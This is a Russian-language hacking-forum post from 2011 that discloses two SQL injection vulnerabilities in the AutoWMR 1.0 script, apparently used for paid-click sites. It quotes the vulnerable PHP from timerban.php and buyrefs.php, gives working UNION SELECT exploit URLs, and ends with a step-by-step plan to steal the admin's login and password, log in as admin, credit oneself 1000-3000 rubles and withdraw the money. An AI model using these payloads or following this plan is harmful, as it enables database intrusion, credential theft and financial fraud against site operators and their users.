Старый 08.02.2011, 19:57   #1
Online
 
Аватар для Online
 
Регистрация: 31.01.2011
Сообщений: 10
Репутация: 10
По умолчанию AutoWMR

AutoWMR (download)
Version: 1.0

SQL inj
if mq = of
Vuln file: timerban.php
PHP код:
///
if(isset($_GET["r"])){
$aidi=($_GET["r"]);
$sql="SELECT * FROM tb_ads WHERE id='$aidi'";
/// 
Exploit:
Код:
http://[host]/[path]/timerban.php?r=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
SQL inj
if mq = of
Vuln file: buyrefs.php
PHP код:
///
$buy=($_GET["buy"]);

if(isset(
$buy)){
require(
'config.php');
$sql="SELECT * FROM tb_users WHERE id='$buy'";

/// 
Exploit:
Код:
http://[host]/[path]/buyrefs.php?buy=-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
P.S на этих движках стоят буксы. Регим акк на новенький кошель и пока забудем о нем... Так вот, узнаем из таблицы tb_users пароль|логин админа, заходим под ним, находим свой акк, начисляем 1000-3000 рублей (смотря сколько денег у админа ), всё. Заходим под своим акком и автоматически выводим деньги .
__________________
Чем больше ты имеешь, тем с большей жадностью стремишься к тому, чего у тебя нет. Война у тебя рождается из побед.
Online вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot